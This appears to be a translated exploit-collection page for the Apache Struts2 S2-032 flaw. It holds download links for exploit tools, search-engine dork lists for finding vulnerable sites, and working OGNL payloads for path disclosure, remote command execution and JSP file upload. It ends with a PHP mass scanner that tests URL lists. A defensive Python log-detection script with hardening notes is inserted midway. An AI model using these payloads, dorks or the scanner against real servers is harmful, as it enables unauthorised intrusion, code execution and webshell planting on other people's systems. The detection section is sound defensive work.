struts2-032
pain edition exploit tool:
Link: http://pan.baidu.com/s/1qXDL8ok Password: 9ka0
S2-032 batch POC tool:
Tool
https://github.com/Xyntax/POC-T
Simple POC
https://github.com/Xyntax/POC-T/blob/master/module/S2032.py
T0n9_Xiaojie edition exploit tool:
Link: http://pan.baidu.com/s/1jIlNJsM Password: 9gbf
Extraction password: www.t0n9.com (also given in the share note)
Search engine keywords:
inurl:VloginUser.action
inurl:Mail.action
inurl:code.action
inurl:reg.action
inurl:Address.action
inurl:!Index.action
inurl:login.action
inurl:Add.action
inurl:pageslist.action
inurl:action.Action
inurl:Message.action
inurl:Ldap.action
inurl:getMul.action
inurl:shouye.action
inurl:logout.action
inurl:Valid.action
inurl:search.action
inurl:Magazine.action
inurl:news.action
inurl:init.action
inurl:Page.action
inurl:create.action
inurl:index2.action
inurl:default.action
inurl:welcome.action
inurl:Name.action
inurl:single.action
inurl:updateForm.action
inurl:SysStart.action
inurl:adminlogin.action
inurl:Offportal.action
inurl:Buying.action
inurl:Success.action
inurl:exchange.action
inurl:menu.action
inurl:Load.action
inurl:airport.action
inurl:Email.action
inurl:On.action
inurl:show.action
inurl:tain.action
inurl:Login!input.action
inurl:randomPicture.action
EXP rewritten by shack2
Get the disk directory (real path of the web root):
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8
Execute command:
1.
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=whoami&pp=\\\\A&ppp=%20&encoding=UTF-8
2.
method:%23_memberAccess[%23parameters.name1[0]]%3dtrue,%23_memberAccess[%23parameters.name[0]]%3dtrue,%23_memberAccess[%23parameters.name2[0]]%3d{},%23_memberAccess[%23parameters.name3[0]]%3d{},%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew%20java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&name=allowStaticMethodAccess&name1=allowPrivateAccess&name2=excludedPackageNamePatterns&name3=excludedClasses&cmd=whoami&pp=\\\\A&ppp=%20&encoding=UTF-8
Upload file:
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23path),%23w.close(),1?%23xx:%23request.toString&shellname=stest.jsp&shellContent=tttt&encoding=UTF-8&pp=%2f
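All of the payloads above share one shape: a query parameter whose name begins with the Dynamic Method Invocation prefix `method:` and whose body is URL-encoded OGNL (`%23_memberAccess`, `@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS`, `ServletActionContext`, `java.lang.Runtime`). That shape is what a defender should look for in web server access logs. The script below is an added example written for this page; it is not code from the page or from any of the tools linked above. The log lines are constructed, and the marker list and the `classify_request` / `scan_log` names are my own choices.

```python
"""Flag S2-032 style requests (DMI "method:" prefix carrying OGNL) in access logs."""
import re
from urllib.parse import unquote

# Strings that appear in the S2-032 payloads shown on this page. They are matched
# after URL-decoding so that %23 / %40 encoding does not hide them.
OGNL_MARKERS = (
    "#_memberAccess",
    "@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS",
    "ServletActionContext@getRequest",
    "ServletActionContext@getResponse",
    "java.lang.Runtime@getRuntime",
    "java.io.FileWriter",
    "allowStaticMethodAccess",
    "excludedPackageNamePatterns",
)

# Request line inside an Apache/Nginx combined-format log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log (not real traffic). Line 2 carries a truncated copy of the
# page's first payload; line 3 merely contains the word "method:" in a parameter value.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2016:10:00:01 +0000] "GET /login.action HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/May/2016:10:00:02 +0000] "GET /login.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23w%3d%23res.getWriter() HTTP/1.1" 200 48 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)"',
    '198.51.100.9 - - [10/May/2016:10:00:03 +0000] "GET /search.action?q=method%3Aname HTTP/1.1" 200 1024 "-" "curl/7.47"',
]


def decode_fully(s, rounds=3):
    """URL-decode repeatedly but boundedly, so a marker sitting behind a second
    encoding layer (re-encoded by a proxy or logging layer) is still visible."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_request(target):
    """Return a finding dict for a request target that looks like S2-032, else None.

    The S2-032 vector is the *name* of a query parameter starting with "method:",
    so the check is on parameter names, not values; OGNL markers anywhere in the
    decoded target are reported as supporting evidence.
    """
    decoded = decode_fully(target)
    query = decoded.partition("?")[2]
    dmi_prefix = any(p.lstrip().startswith("method:") for p in query.split("&"))
    markers = [m for m in OGNL_MARKERS if m in decoded]
    if not dmi_prefix and not markers:
        return None
    return {"dmi_prefix": dmi_prefix, "markers": markers, "decoded": decoded}


def scan_log(lines):
    """Return (line_number, client_ip, finding) for every suspicious request line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        finding = classify_request(match.group("target"))
        if finding:
            client_ip = line.split(" ", 1)[0]
            hits.append((number, client_ip, finding))
    return hits


if __name__ == "__main__":
    for number, client_ip, finding in scan_log(SAMPLE_LOG):
        print(f"line {number}: {client_ip} dmi_prefix={finding['dmi_prefix']} markers={finding['markers']}")
```

To run it over a real log, replace SAMPLE_LOG with the file's lines. Because the check is on the parameter name, a legitimate request that merely contains the text "method:" in a value (line 3 of the sample) is not flagged, while the truncated payload on line 2 is reported with the OGNL markers it contains. On the server side, the corresponding hardening is to set `struts.enable.DynamicMethodInvocation` to `false` in struts.xml, which removes the `method:` prefix handling that S2-032 abuses, and to upgrade to a Struts release that closes the issue.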
Struts2 PHP batch scanning tool
Usage: php exp.php url.txt
<?php
/*
Struts2 batch scanning tool
By:T0n9
*/
error_reporting(0);
if(empty($argv[1])){
    print_r("
+==================================+
| S2-032命令执行批量扫描工具 |
+==================================+
[+]程序还存在一些Bug 比如一些奇葩网站的回显误报相对较低
[+]扫完同目录生成文件名_ok.txt文本存放存在漏洞的网站
->php $argv[0] url.txt
");exit;
}
$txt = explode("\n",file_get_contents($argv[1])); // list of URLs to scan, one per line
echo "[+]$argv[1] 共 ".count($txt)." 条\r\n";
// POC that asks the server to echo back the real disk path of the web root
$poc = "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8";
for($i = 0;$i<count($txt);$i++){
    if(!empty($txt[$i])){
        $u = trim($txt[$i]).$poc;
        $data_str = c($u);
        // An HTML body ("</" present) or an empty body means no path was echoed back.
        // stripos() returns 0 when "</" is at offset 0, so compare strictly against false.
        if(stripos($data_str,"</") !== false || empty($data_str)){
            echo trim($txt[$i])." No \n";
        }else{
            echo trim($txt[$i])." Yes Path:".trim($data_str)." \n";
            $fp = fopen($argv[1]."_OK.txt",'a+');
            fwrite($fp,trim($txt[$i])."\r\n");
            fclose($fp);
        }
    }
}
echo "\r\n[+]扫描完毕 请到".$argv[1]."_OK.txt查看结果";
// Fetch a URL and return the response body (no headers), or false on failure
function c($url){
    $c = curl_init();
    curl_setopt($c,CURLOPT_URL,$url);
    curl_setopt($c,CURLOPT_BINARYTRANSFER,true);
    curl_setopt($c, CURLOPT_HEADER, 0);
    curl_setopt($c, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)');
    curl_setopt($c, CURLOPT_TIMEOUT, 15);
    curl_setopt($c, CURLOPT_REFERER, $url);
    curl_setopt($c,CURLOPT_RETURNTRANSFER,1);
    $data = curl_exec($c);
    curl_close($c); // must run before return; the original placed it after return, where it never executed
    return $data;
}
?>